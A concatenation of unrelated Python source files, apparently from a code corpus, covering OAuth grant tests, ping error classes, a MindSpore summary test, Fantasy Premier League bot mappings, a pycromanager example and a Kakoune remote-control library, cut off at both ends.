        mock_client = mock.MagicMock()
        mock_client.user.return_value = 'mocked user'
        self.request = Request('http://a.b/path')
        self.request.grant_type = 'client_credentials'
        self.request.client = mock_client
        self.request.scopes = ('mocked', 'scopes')
        self.mock_validator = mock.MagicMock()
        self.auth = ClientCredentialsGrant(
                request_validator=self.mock_validator)
    def test_create_token_response(self):
        """Token response includes access token, type and expiry (no refresh
        token for this grant)."""
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertIn('access_token', token)
        self.assertIn('token_type', token)
        self.assertIn('expires_in', token)
    def test_error_response(self):
        # TODO: implement
        pass
    def test_validate_token_response(self):
        # wrong grant type, scope
        pass
class RefreshTokenGrantTest(TestCase):
    """Tests for the RFC 6749 refresh-token grant."""
    def setUp(self):
        mock_client = mock.MagicMock()
        mock_client.user.return_value = 'mocked user'
        self.request = Request('http://a.b/path')
        self.request.grant_type = 'refresh_token'
        self.request.refresh_token = 'lsdkfhj230'
        self.request.client = mock_client
        self.request.scope = 'foo'
        self.mock_validator = mock.MagicMock()
        self.auth = RefreshTokenGrant(
                request_validator=self.mock_validator)
    def test_create_token_response(self):
        """Requested scope 'foo' (a subset of the original) is honoured."""
        self.mock_validator.get_original_scopes.return_value = ['foo', 'bar']
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertIn('access_token', token)
        self.assertIn('token_type', token)
        self.assertIn('expires_in', token)
        self.assertEqual(token['scope'], 'foo')
    def test_create_token_inherit_scope(self):
        """With no requested scope, the original token's scopes are reused."""
        self.request.scope = None
        self.mock_validator.get_original_scopes.return_value = ['foo', 'bar']
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertIn('access_token', token)
        self.assertIn('token_type', token)
        self.assertIn('expires_in', token)
        self.assertEqual(token['scope'], 'foo bar')
    def test_invalid_scope(self):
        """Requesting a scope outside the original set yields 401."""
        self.mock_validator.get_original_scopes.return_value = ['baz']
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertEqual(token['error'], 'invalid_scope')
        self.assertEqual(status_code, 401)
    def test_invalid_token(self):
        """An unrecognised refresh token yields invalid_grant / 400."""
        self.mock_validator.validate_refresh_token.return_value = False
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertEqual(token['error'], 'invalid_grant')
        self.assertEqual(status_code, 400)
    def test_invalid_client(self):
        """Failed client authentication yields invalid_client / 401."""
        self.mock_validator.authenticate_client.return_value = False
        bearer = BearerToken(self.mock_validator)
        uri, headers, body, status_code = self.auth.create_token_response(
                self.request, bearer)
        token = json.loads(body)
        self.assertEqual(token['error'], 'invalid_client')
        self.assertEqual(status_code, 401)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from .replay_base import ReplayBufferBase, PrioritizedReplayBufferBase
from .simple_replay import SimpleReplayBuffer
from .prioritized_replay import PrioritizedReplayBuffer
|
nilq/baby-python
|
python
|
class PingError(Exception):
    """Base class for all ping-related errors."""
    pass


class TimeExceeded(PingError):
    """An ICMP Time Exceeded message was received."""
    pass


class TimeToLiveExpired(TimeExceeded):
    """Time Exceeded: the packet's TTL reached zero in transit.

    ip_header/icmp_header hold the parsed headers of the ICMP reply, if any.
    """
    def __init__(self, message="Time exceeded: Time To Live expired.", ip_header=None, icmp_header=None):
        self.ip_header = ip_header
        self.icmp_header = icmp_header
        self.message = message
        super().__init__(self.message)


class DestinationUnreachable(PingError):
    """An ICMP Destination Unreachable message was received.

    When an IP header is supplied, the reporting host's address
    (ip_header['src_addr']) is appended to the message.
    """
    def __init__(self, message="Destination unreachable.", ip_header=None, icmp_header=None):
        self.ip_header = ip_header
        self.icmp_header = icmp_header
        self.message = message if self.ip_header is None else message + " (Host='{}')".format(self.ip_header.get("src_addr"))
        super().__init__(self.message)


class DestinationHostUnreachable(DestinationUnreachable):
    """Destination Unreachable: specifically, the host itself is unreachable."""
    def __init__(self, message="Destination unreachable: Host unreachable.", ip_header=None, icmp_header=None):
        # The original duplicated the parent's __init__ verbatim; only the
        # default message differs, so delegate to the parent instead.
        super().__init__(message, ip_header, icmp_header)


class HostUnknown(PingError):
    """The destination hostname could not be resolved."""
    def __init__(self, message="Cannot resolve: Unknown host.", dest_addr=None):
        self.dest_addr = dest_addr
        self.message = message if self.dest_addr is None else message + " (Host='{}')".format(self.dest_addr)
        super().__init__(self.message)


class Timeout(PingError):
    """No ICMP reply arrived within the configured timeout."""
    def __init__(self, message="Request timeout for ICMP packet.", timeout=None):
        self.timeout = timeout
        self.message = message if self.timeout is None else message + " (Timeout={}s)".format(self.timeout)
        super().__init__(self.message)
|
nilq/baby-python
|
python
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test model train """
import os
import re
import tempfile
import shutil
import pytest
from mindspore import dataset as ds
from mindspore import nn, Tensor, context
from mindspore.nn.metrics import Accuracy
from mindspore.nn.optim import Momentum
from mindspore.dataset.transforms import c_transforms as C
from mindspore.dataset.transforms.vision import c_transforms as CV
from mindspore.dataset.transforms.vision import Inter
from mindspore.common import dtype as mstype
from mindspore.common.initializer import TruncatedNormal
from mindspore.ops import operations as P
from mindspore.train import Model
from mindspore.train.callback import SummaryCollector
from tests.summary_utils import SummaryReader
def conv(in_channels, out_channels, kernel_size, stride=1, padding=0):
    """Build a bias-free, valid-padded Conv2d with truncated-normal weights."""
    return nn.Conv2d(
        in_channels,
        out_channels,
        kernel_size=kernel_size,
        stride=stride,
        padding=padding,
        weight_init=weight_variable(),
        has_bias=False,
        pad_mode="valid",
    )
def fc_with_initialize(input_channels, out_channels):
    """Build a Dense layer with truncated-normal weight and bias initializers."""
    weight_init = weight_variable()
    bias_init = weight_variable()
    return nn.Dense(input_channels, out_channels, weight_init, bias_init)
def weight_variable():
    """Shared initializer for conv/fc layers: truncated normal, sigma 0.02."""
    return TruncatedNormal(0.02)
class LeNet5(nn.Cell):
    """Define LeNet5 network, instrumented with summary ops so tests can
    verify the tags recorded in the summary file."""
    def __init__(self, num_class=10, channel=1):
        super(LeNet5, self).__init__()
        self.num_class = num_class
        # Classic LeNet-5 conv/fc stack.
        self.conv1 = conv(channel, 6, 5)
        self.conv2 = conv(6, 16, 5)
        self.fc1 = fc_with_initialize(16 * 5 * 5, 120)
        self.fc2 = fc_with_initialize(120, 84)
        self.fc3 = fc_with_initialize(84, self.num_class)
        self.relu = nn.ReLU()
        self.max_pool2d = nn.MaxPool2d(kernel_size=2, stride=2)
        self.flatten = nn.Flatten()
        # Summary ops: each records a value under a fixed tag during
        # construct(); the test asserts these tags appear in the output.
        self.scalar_summary = P.ScalarSummary()
        self.image_summary = P.ImageSummary()
        self.histogram_summary = P.HistogramSummary()
        self.tensor_summary = P.TensorSummary()
        self.channel = Tensor(channel)
    def construct(self, data):
        """define construct."""
        # Record the raw input, then interleave summaries with the usual
        # conv -> relu -> pool -> fc pipeline.
        self.image_summary('image', data)
        output = self.conv1(data)
        self.histogram_summary('histogram', output)
        output = self.relu(output)
        self.tensor_summary('tensor', output)
        output = self.max_pool2d(output)
        output = self.conv2(output)
        output = self.relu(output)
        output = self.max_pool2d(output)
        output = self.flatten(output)
        output = self.fc1(output)
        output = self.relu(output)
        output = self.fc2(output)
        output = self.relu(output)
        output = self.fc3(output)
        self.scalar_summary('scalar', self.channel)
        return output
def create_dataset(data_path, batch_size=32, repeat_size=1, num_parallel_workers=1):
    """create dataset for train or test

    Args:
        data_path: directory containing the MNIST data files.
        batch_size: samples per batch (incomplete final batch is dropped).
        repeat_size: number of dataset repetitions.
        num_parallel_workers: workers for each map operation.
    """
    # define dataset
    mnist_ds = ds.MnistDataset(data_path)
    resize_height, resize_width = 32, 32
    rescale = 1.0 / 255.0
    # Normalization constants derived from MNIST mean 0.1307 / std 0.3081.
    rescale_nml = 1 / 0.3081
    shift_nml = -1 * 0.1307 / 0.3081
    # define map operations
    resize_op = CV.Resize((resize_height, resize_width), interpolation=Inter.LINEAR)  # Bilinear mode
    rescale_nml_op = CV.Rescale(rescale_nml, shift_nml)
    rescale_op = CV.Rescale(rescale, shift=0.0)
    hwc2chw_op = CV.HWC2CHW()
    type_cast_op = C.TypeCast(mstype.int32)
    # apply map operations on images
    mnist_ds = mnist_ds.map(input_columns="label", operations=type_cast_op, num_parallel_workers=num_parallel_workers)
    mnist_ds = mnist_ds.map(input_columns="image", operations=resize_op, num_parallel_workers=num_parallel_workers)
    mnist_ds = mnist_ds.map(input_columns="image", operations=rescale_op, num_parallel_workers=num_parallel_workers)
    mnist_ds = mnist_ds.map(input_columns="image", operations=rescale_nml_op, num_parallel_workers=num_parallel_workers)
    mnist_ds = mnist_ds.map(input_columns="image", operations=hwc2chw_op, num_parallel_workers=num_parallel_workers)
    # apply DatasetOps
    mnist_ds = mnist_ds.shuffle(buffer_size=10000)  # 10000 as in LeNet train script
    mnist_ds = mnist_ds.batch(batch_size, drop_remainder=True)
    mnist_ds = mnist_ds.repeat(repeat_size)
    return mnist_ds
class TestSummary:
    """Test summary collector the basic function."""
    base_summary_dir = ''
    mnist_path = '/home/workspace/mindspore_dataset/mnist'
    @classmethod
    def setup_class(cls):
        """Run before test this class: create a scratch dir for summaries."""
        cls.base_summary_dir = tempfile.mkdtemp(suffix='summary')
    @classmethod
    def teardown_class(cls):
        """Run after test this class: remove the scratch dir."""
        if os.path.exists(cls.base_summary_dir):
            shutil.rmtree(cls.base_summary_dir)
    @pytest.mark.level0
    @pytest.mark.platform_x86_ascend_training
    @pytest.mark.env_onecard
    def test_summary_ascend(self):
        """Test summary ascend."""
        context.set_context(mode=context.GRAPH_MODE)
        self._run_network()
    def _run_network(self, dataset_sink_mode=True):
        """Train and eval LeNet5 for one epoch with a SummaryCollector
        attached, then validate the summary file it produced."""
        lenet = LeNet5()
        loss = nn.SoftmaxCrossEntropyWithLogits(is_grad=False, sparse=True, reduction="mean")
        optim = Momentum(lenet.trainable_params(), learning_rate=0.1, momentum=0.9)
        model = Model(lenet, loss_fn=loss, optimizer=optim, metrics={'acc': Accuracy()})
        summary_dir = tempfile.mkdtemp(dir=self.base_summary_dir)
        summary_collector = SummaryCollector(summary_dir=summary_dir, collect_freq=1)
        ds_train = create_dataset(os.path.join(self.mnist_path, "train"))
        model.train(1, ds_train, callbacks=[summary_collector], dataset_sink_mode=dataset_sink_mode)
        ds_eval = create_dataset(os.path.join(self.mnist_path, "test"))
        model.eval(ds_eval, dataset_sink_mode=dataset_sink_mode, callbacks=[summary_collector])
        self._check_summary_result(summary_dir)
    @staticmethod
    def _check_summary_result(summary_dir):
        """Locate the generated summary file and verify the recorded tags."""
        summary_file_path = ''
        for file in os.listdir(summary_dir):
            if re.search("_MS", file):
                summary_file_path = os.path.join(summary_dir, file)
                break
        # BUG FIX: the original asserted `not summary_file_path`, which passes
        # only when NO summary file was found — and would then hand an empty
        # path to SummaryReader. A summary file must exist at this point.
        assert summary_file_path
        with SummaryReader(summary_file_path) as summary_reader:
            tags = set()
            # Read the event that record by SummaryCollector.begin
            summary_reader.read_event()
            summary_event = summary_reader.read_event()
            for value in summary_event.summary.value:
                tags.add(value.tag)
            # There will not record input data when dataset sink mode is True
            expected_tags = ['conv1.weight/auto', 'conv2.weight/auto', 'fc1.weight/auto', 'fc1.bias/auto',
                             'fc2.weight/auto', 'histogram', 'image', 'scalar', 'tensor']
            assert set(expected_tags) == tags
|
nilq/baby-python
|
python
|
import re
# Map of short/display player names (as used by FPL or colloquially) to the
# full legal names used by Understat, so the two data sources can be joined.
player_dict = {
    "Fred": "Frederico Rodrigues de Paula Santos",
    "Ki Sung-yueng": "Sung-yueng Ki",
    "Solly March": "Solomon March",
    "Jonny": "Jonathan Castro Otto",
    "Felipe Anderson": "Felipe Anderson Pereira Gomes",
    "Mat Ryan": "Mathew Ryan",
    "Kenedy": "Robert Kenedy Nunes do Nascimento",
    "Jorginho": "Jorge Luiz Frello Filho",
    "Bernard": "Bernard Anício Caldeira Duarte",
    "Romain Saiss": "Romain Saïss",
    "Bernardo Silva": "Bernardo Mota Veiga de Carvalho e Silva",
    "N'Golo Kanté": "N'Golo Kanté",
    "João Moutinho": "João Filipe Iria Santos Moutinho",
    "Franck Zambo": "André-Frank Zambo Anguissa",
    "Fousseni Diabate": "Fousseni Diabaté",
    "Jazz Richards": "Ashley Darel Jazz Richards",
    "Danilo": "Danilo Luiz da Silva",
    "Richarlison": "Richarlison de Andrade",
    "Bernardo": "Bernardo Fernandes da Silva Junior",
    "Fernandinho": "Fernando Luiz Rosa",
    "Joselu": "Jose Luis Mato Sanmartín",
    "Son Heung-Min": "Heung-Min Son",
    "Diogo Dalot": "José Diogo Dalot Teixeira",
    "José Izquierdo": "José Heriberto Izquierdo Mena",
    "Fabri": "Fabricio Agosto Ramírez",
    "Eddie Nketiah": "Edward Nketiah",
    "Rui Patrício": "Rui Pedro dos Santos Patrício",
    # NOTE(review): "Cunninghamm" looks like a typo, but it may mirror the
    # upstream data source exactly — confirm before changing.
    "Greg Cunningham": "Greg Cunninghamm",
    "Junior Hoilett": "David Junior Hoilett",
    "Isaac Success": "Isaac Success Ajayi",
    "Xande Silva": "Alexandre Nascimento Costa Silva",
    "Bruno": "Bruno Saltor Grau",
    "Léo Bonatini": "Bonatini Lohner Maia Bonatini",
    "André Gomes": "André Filipe Tavares Gomes",
    "Kiko Femenía": "Francisco Femenía Far",
    "Dele Alli": "Bamidele Alli",
    "Ricardo Pereira": "Ricardo Domingos Barbosa Pereira",
    "Sokratis": "Sokratis Papastathopoulos",
    "Alisson": "Alisson Ramses Becker",
    "Fabinho": "Fabio Henrique Tavares",
    "Adrien Silva": "Adrien Sebastian Perruchet Silva",
    "David de Gea": "David De Gea",
    "Gabriel Jesus": "Gabriel Fernando de Jesus",
    "Pedro": "Pedro Rodríguez Ledesma",
    "Zanka": "Mathias Jorgensen",
    "David Luiz": "David Luiz Moreira Marinho",
    "Rúben Neves": "Rúben Diogo da Silva Neves",
    "Ben Chilwell": "Benjamin Chilwell",
    "Kepa": "Kepa Arrizabalaga",
    "Emerson": "Emerson Palmieri dos Santos",
    "Ederson": "Ederson Santana de Moraes",
    "Chicharito": "Javier Hernández Balcázar",
    "Rúben Vinagre": "Rúben Gonçalo Silva Nascimento Vinagre",
    "Oriol Romeu": "Oriol Romeu Vidal",
    "Lucas Moura": "Lucas Rodrigues Moura da Silva",
    "Willian": "Willian Borges Da Silva",
}
# Map of Understat team names to the shorter names used by FPL.
team_dict = {
    "Manchester City": "Man City",
    "Tottenham": "Spurs",
    "Manchester United": "Man Utd",
    "Wolverhampton Wanderers": "Wolves"
}
# Understat statistics pulled through into player summaries.
desired_attributes = [
    "xG",
    "xA",
    "key_passes",
    "npg",
    "npxG",
    "xGChain",
    "xGBuildup",
    "shots",
    "understat_history"
]
# Matches "!fplbot <name> vs <name> [number]"; names may contain spaces,
# hyphens and Latin-1 accented letters.
# BUG FIX: the original used [A-z], which also matches '[', '\', ']', '^',
# '_' and '`' (the ASCII range between 'Z' and 'a'); [A-Za-z] restricts the
# class to letters as intended.
versus_pattern = re.compile(r"!fplbot\s+([A-Za-zÀ-ÿ]+(?:[\s-][A-Za-zÀ-ÿ]+)*)\s+(?:vs.|vs)\s+([A-Za-zÀ-ÿ]+(?:[\s-][A-Za-zÀ-ÿ]+)*)\s*(\d+)?")
# Map of common aliases/nicknames (lowercased) to canonical FPL team names,
# used to normalise free-text team mentions.
to_fpl_team_dict = {
    "arsenal fc": "arsenal",
    "the gunners": "arsenal",
    "afc bournemouth": "bournemouth",
    "the cherries": "bournemouth",
    "boscombe": "bournemouth",
    "the seagulls": "brighton",
    "albion": "brighton",
    "brighton and hove albion": "brighton",
    "brighton & hove albion": "brighton",
    "brighton fc": "brighton",
    "bha": "brighton",
    "burnley fc": "burnley",
    "the clarets": "burnley",
    "chelsea fc": "chelsea",
    "cfc": "chelsea",
    "che": "chelsea",
    "the pensioners": "chelsea",
    "crystal palace fc": "crystal palace",
    "cpfc": "crystal palace",
    "cp": "crystal palace",
    "the eagles": "crystal palace",
    "the glaziers": "crystal palace",
    "everton fc": "everton",
    "the toffees": "everton",
    "leicester city": "leicester",
    "leicester city fc": "leicester",
    "the foxes": "leicester",
    "lfc": "liverpool",
    "liverpool fc": "liverpool",
    "mcfc": "man city",
    "manchester city": "man city",
    "manchester city fc": "man city",
    "man city fc": "man city",
    "citizens": "man city",
    "mufc": "man utd",
    "manchester united": "man utd",
    "manchester utd": "man utd",
    "man u": "man utd",
    "man united": "man utd",
    "the red devils": "man utd",
    "red devils": "man utd",
    "newcastle united": "newcastle",
    "newcastle united fc": "newcastle",
    "nufc": "newcastle",
    "newcastle utd": "newcastle",
    "the magpies": "newcastle",
    "southampton fc": "southampton",
    "the saints": "southampton",
    "tottenham": "spurs",
    "thfc": "spurs",
    "tottenham hotspur": "spurs",
    "tottenham hotspurs": "spurs",
    "tottenham fc": "spurs",
    "watford fc": "watford",
    "wfc": "watford",
    "the hornets": "watford",
    "west ham united": "west ham",
    "west ham utd": "west ham",
    "the hammers": "west ham",
    "west ham fc": "west ham",
    "west ham united fc": "west ham",
    "wolverhampton": "wolves",
    "wolverhampton wanderers": "wolves",
    "wolves fc": "wolves",
    "wolverhampton fc": "wolves",
    "wolverhampton wanderers fc": "wolves",
    "the wanderers": "wolves",
    "avfc": "aston villa",
    "villa": "aston villa",
    "the canaries": "norwich",
    "sheffield": "sheffield utd",
    "sheffield united": "sheffield utd",
    "the blades": "sheffield utd"
}
# Canonical (lowercased) FPL team names recognised by the bot.
fpl_team_names = [
    "arsenal",
    "aston villa",
    "brighton",
    "burnley",
    "chelsea",
    "crystal palace",
    "everton",
    "fulham",
    "leicester",
    "leeds",
    "liverpool",
    "man city",
    "man utd",
    "newcastle",
    "norwich",
    "sheffield utd",
    "southampton",
    "spurs",
    # BUG FIX: a missing comma after "west brom" made Python concatenate the
    # adjacent string literals into a single bogus entry "west bromwest ham",
    # silently dropping "west ham" from the list.
    "west brom",
    "west ham",
    "wolves"
]
# Map of three-letter FPL team codes to official club Twitter handles.
twitter_usernames = {
    "MCI": "ManCity",
    "LIV": "LFC",
    "ARS": "Arsenal",
    "LEI": "LCFC",
    "MUN": "ManUtd",
    "CRY": "CPFC",
    "SHU": "SheffieldUnited",
    "SOU": "SouthamptonFC",
    "WHU": "WestHam",
    "BHA": "OfficialBHAFC",
    "CHE": "ChelseaFC",
    "EVE": "Everton",
    "AVL": "AVFCOfficial",
    "TOT": "SpursOfficial",
    "NEW": "NUFC",
    "WOL": "Wolves",
    "BUR": "BurnleyOfficial",
    "LEE": "LUFC",
    "WBA": "WBA",
    "FUL": "FulhamFC"
}
# Word pairs whose co-occurrence in a tweet marks it as a team-lineup
# announcement (e.g. "line up", "team news").
lineup_markers = [
    ("line", "up"),
    ("team", "news")
]
|
nilq/baby-python
|
python
|
from pycromanager import MagellanAcquisition, multi_d_acquisition_events, Bridge
import numpy as np
def hook_fn(event):
    """Pre-hardware hook: pass every acquisition event through unchanged.

    (A hook may return None to drop an event; this one never does. The
    commented-out random-drop experiment from the original was removed.)
    """
    return event
def img_process_fn(image, metadata):
    """Image processor: stamp a random-valued rectangle into the frame.

    Overwrites rows 250:350, cols 100:300 in place with a single random value
    in [0, 4999); metadata passes through untouched.
    """
    fill_value = np.random.randint(0, 4999)
    image[250:350, 100:300] = fill_value
    return image, metadata
# magellan example
# Run an exploratory Magellan acquisition with the event hook and image
# processor attached; await_completion() blocks until the acquisition ends.
acq = MagellanAcquisition(
    # magellan_acq_index=0,
    magellan_explore=True,
    pre_hardware_hook_fn=hook_fn,
    image_process_fn=img_process_fn,
)
acq.await_completion()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from six.moves.queue import Queue
from subprocess import Popen, PIPE
from threading import Thread
import functools
import itertools as it
import os
import re
import six
import sys
import tempfile
import time
import utils
class Remote(object):
    def __init__(self, session):
        """Build a remote-command wrapper bound to a kak session.

        pre/post bracket the generated kak script ('%sh(' ... ')'); the
        static helper methods below rewrap them to add behaviour.
        """
        self.session = session
        self.pre = lambda _: '%sh('
        self.post = ')'
        self.arg_config = {}  # arg name -> (kak variable, parser)
        self.puns = True
        self.argnames = []
        self.sync_setup = False
        self.required_names = {'client'}
        def ret():
            # Default return behaviour: listen once for the fifo message,
            # then clean up. (listen/fifo_cleanup are presumably defined
            # later in this class — confirm.)
            x = self.listen()
            self.fifo_cleanup()
            return x
        self.ret = ret
    @staticmethod
    def _resolve(self_or_session):
        """Return *self_or_session* if it is already a Remote, otherwise
        wrap the session identifier in a fresh Remote."""
        if isinstance(self_or_session, Remote):
            return self_or_session
        else:
            return Remote(self_or_session)
@staticmethod
def setup_reply_channel(self_or_session):
r = Remote._resolve(self_or_session)
r_pre = r.pre
r.pre = lambda f: r_pre(f) + '''
__reply_fifo_dir=$(mktemp -d)
__reply_fifo="${__reply_fifo_dir}/fifo"
mkfifo ${__reply_fifo}
'''
r.post = '''
\ncat ${__reply_fifo}
rm ${__reply_fifo}
rmdir ${__reply_fifo_dir}
''' + r.post
r.arg_config['reply_fifo'] = ('__reply_fifo', Args.string)
r.required_names.add('reply_fifo')
return r
@staticmethod
def asynchronous(self_or_session):
r = Remote._resolve(self_or_session)
r_ret = r.ret
r.ret = lambda: utils.fork()(r_ret)
return r
@staticmethod
def onclient(self_or_session, client, sync=True):
r = Remote._resolve(self_or_session)
r_pre = r.pre
r.pre = lambda f: 'eval -client ' + client + ' %(' + r_pre(f)
r.post = ')' + r.post
if not sync:
r.asynchronous(r)
return r
@staticmethod
def hook(self_or_session, scope, name, group=None, filter='.*',
sync_setup=False, client=None):
r = Remote._resolve(self_or_session)
r.sync_setup = sync_setup
group = ' -group ' + group if group else ''
filter = utils.single_quoted(filter)
cmd = 'hook' + group + ' ' + scope + ' ' + name + ' ' + filter + ' %('
r_pre = r.pre
r.pre = lambda f: cmd + r_pre(f)
r.post = ')' + r.post
r.ret = lambda: utils.fork(loop=True)(r.listen)
if client:
r.onclient(r, client)
return r
def _f_name(self):
return self.f.__name__.replace('_', '-')
@staticmethod
def command(self_or_session, params='0', enum=[],
sync_setup=False, sync_python_calls=False, hidden=False):
r = Remote._resolve(self_or_session)
r.sync_setup = sync_setup
def ret():
utils.fork(loop=True)(r.listen)
@functools.wraps(r.f)
def call_from_python(client, *args):
escaped = [utils.single_quoted(arg) for arg in args]
pipe(r.session, ' '.join([r._f_name()] + escaped), client,
sync=sync_python_calls)
return call_from_python
r.ret = ret
r_pre = r.pre
def pre(f):
s = 'def -allow-override -params {params} -docstring {docstring} {name} {hidden}'
s = s.format(name=r._f_name(),
params=params,
hidden=(hidden and "-hidden") or '',
docstring=utils.single_quoted(utils.deindent(f.__doc__ or '')))
if enum:
sh = '\n'.join('[ $kak_token_to_complete -eq {} ] && printf "{}\n"'.format(i, '\\n'.join(es))
for i, es in enumerate(enum))
s += ' -shell-candidates %{' + sh + '} '
s += ' %('
s += r_pre(f)
return s
r.pre = pre
r.post += ')'
return r
def _argnames(self):
names = set(self.required_names)
names.update(self.argnames)
if self.puns:
names.update(utils.argnames(self.f))
return list(names)
@staticmethod
def _msg(splices, fifo):
underscores = []
argsplice = []
for s in splices:
underscores.append('__' + s + '=${' + s + '//_/_u}')
argsplice.append('${__' + s + '//$__newline/_n}')
underscores = '\n'.join(underscores)
argsplice = '_s'.join(argsplice)
m = ["__newline='\n'"]
if '__args' in splices:
m.append('__args=""')
m.append('for __arg; do __args="${__args}_S${__arg//_/_u}"; done')
m.append(underscores)
m.append('echo -n "' + argsplice + '" > ' + fifo)
return '\n'.join(m)
def __call__(self, f):
self.f = f
splices, self.parse = Args.argsetup(self._argnames(), self.arg_config)
self.fifo, self.fifo_cleanup = _mkfifo()
msg = self.pre(f) + self._msg(splices, self.fifo) + self.post
pipe(self.session, msg, sync=self.sync_setup)
return self.ret()
def listen(self):
_debug(self.f.__name__ + ' ' + self.fifo + ' waiting for call...')
with open(self.fifo, 'r') as fp:
line = utils.decode(fp.readline()).rstrip()
if line == '_q':
self.fifo_cleanup()
_debug(self.fifo, 'demands quit')
raise RuntimeError('fifo demands quit')
_debug(self.f.__name__ + ' ' + self.fifo + ' replied:' + repr(line))
r = self.parse(line)
try:
def _pipe(msg, sync=False):
return pipe(self.session, msg, r['client'], sync)
r['pipe'] = _pipe
d = {}
if 'reply_fifo' in r:
d['reply_calls'] = 0
def reply(msg):
d['reply_calls'] += 1
with open(r['reply_fifo'], 'w') as fp:
fp.write(msg)
r['reply'] = reply
result = utils.safe_kwcall(self.f, r) if self.puns else self.f(r)
if 'reply_fifo' in r:
if d['reply_calls'] != 1:
print('!!! [ERROR] Must make exactly 1 call to reply, ' +
self.f + ' ' + self.r + ' made ' + d['reply_calls'],
file=sys.stderr)
return result
except TypeError as e:
print(str(e), file=sys.stderr)
def pipe(session, msg, client=None, sync=False):
    """
    Send commands to a running Kakoune process.
    If sync is true, this function will return after
    the commands have been executed.
    >>> with tempfile.NamedTemporaryFile() as tmp:
    ...     kak = headless()
    ...     pipe(kak.pid, 'edit ' + tmp.name, 'unnamed0', sync=True)
    ...     pipe(kak.pid, 'exec itest<esc>', 'unnamed0')
    ...     pipe(kak.pid, 'write', 'unnamed0', sync=True)
    ...     print(utils.decode(tmp.read()).rstrip())
    ...     pipe(kak.pid, 'quit', 'unnamed0', sync=True)
    ...     kak.wait()
    test
    0
    """
    if client:
        # Route the message to a specific client via a temp file, because
        # quoting arbitrary msg text inline inside eval is fragile.
        # NOTE(review): tempfile.mktemp is race-prone (file created only
        # after the name is handed out) — consider mkstemp; confirm no
        # concurrent writers before changing.
        import tempfile
        name = tempfile.mktemp()
        with open(name, 'wb') as tmp:
            tmp.write(utils.encode(msg))
        msg = u'eval -client {} "%sh`cat {}; rm {}`"'.format(client, name, name)
    if sync:
        # Append a completion ping: Kakoune echoes into a fresh fifo once
        # the commands above it have run; we block on that fifo below.
        fifo, fifo_cleanup = _mkfifo()
        msg += u'\n%sh(echo done > {})'.format(fifo)
    # _debug('piping: ', msg.replace('\n', ' ')[:70])
    _debug('piping: ', msg)
    if hasattr(session, '__call__'):
        # Test hook: a callable "session" receives the message directly.
        session(msg)
    else:
        # Real session: feed the message to `kak -p <session>` over stdin.
        p = Popen(['kak', '-p', str(session).rstrip()], stdin=PIPE)
        p.stdin.write(utils.encode(msg))
        p.stdin.flush()
        p.stdin.close()
    if sync:
        _debug(fifo + ' waiting for completion...',
               msg.replace('\n', ' ')[:60])
        # Blocks until Kakoune executes the appended `echo done` line.
        with open(fifo, 'r') as fifo_fp:
            fifo_fp.readline()
        _debug(fifo + ' going to clean up...')
        fifo_cleanup()
        _debug(fifo + ' done')
#############################################################################
# Kakoune commands
def select(cursors):
    """
    A command to select some cursors.
    >>> print(select([((1,2),(1,4)), ((3,1),(5,72))]))
    select 1.2,1.4:3.1,5.72
    """
    descs = []
    for (anchor_line, anchor_col), (head_line, head_col) in cursors:
        descs.append('%d.%d,%d.%d' % (anchor_line, anchor_col,
                                      head_line, head_col))
    return 'select ' + ':'.join(descs)
def change(range, new_text):
    """
    A command to change some text
    >>> print(change(((1,2), (3,4)), 'test'))
    select 1.2,3.4; execute-keys -draft ctest<esc>
    """
    edit_keys = '; execute-keys -draft c' + new_text + '<esc>'
    return select([range]) + edit_keys
def menu(options, auto_single=True):
    """
    A command to make a menu.
    Takes a list of 2-tuples of an entry and the command it executes.
    >>> print(menu([('one', 'echo one'), ('two', 'echo two')]))
    menu 'one' 'echo one' 'two' 'echo two'
    >>> print(menu([('one', 'echo one')]))
    echo one
    >>> print(menu([('one', 'echo one')], auto_single=False))
    menu 'one' 'echo one'
    """
    entries = list(options)
    # With a single entry, skip the menu and run its command directly.
    if auto_single and len(entries) == 1:
        return entries[0][1]
    quoted = map(utils.single_quoted, it.chain(*entries))
    return 'menu ' + utils.join(quoted)
def complete(line, column, timestamp, completions):
    u"""
    Format completion for a Kakoune option.
    >>> print(complete(5, 20, 1234, [
    ...     ('__doc__', 'object’s docstring', '__doc__ (method)'),
    ...     ('||', 'logical or', '|| (func: infix)')
    ... ]))
    5.20@1234:__doc__|object’s docstring|__doc__ (method):\|\||logical or|\|\| (func\: infix)
    """
    escaped_rows = []
    for entry in completions:
        # '|' and ':' are structural in the option format, so escape them
        # inside every cell before joining.
        cells = (utils.backslash_escape('|:', cell) for cell in entry)
        escaped_rows.append(utils.join(cells, sep='|'))
    return u'{}.{}@{}:{}'.format(line, column, timestamp,
                                 utils.join(escaped_rows, sep=':'))
#############################################################################
# Arguments and argument parsers
class Args(object):
    """Parsers for the underscore-escaped values Kakoune splices into fifos.

    Encoding (produced by Remote._msg): '_u' for '_', '_n' for newline,
    '_s' between fields, '_S' between shell arguments.

    FIX(review): the re.sub replacement in ``listof`` used '\\g<1>' in a
    non-raw string — an invalid escape sequence that raises
    DeprecationWarning/SyntaxWarning on modern Python.  Now a raw string;
    the runtime value is identical.
    """
    @staticmethod
    def coord(s):
        """
        Parse a Kakoune coordinate.
        """
        return tuple(map(int, s.split('.')))
    @staticmethod
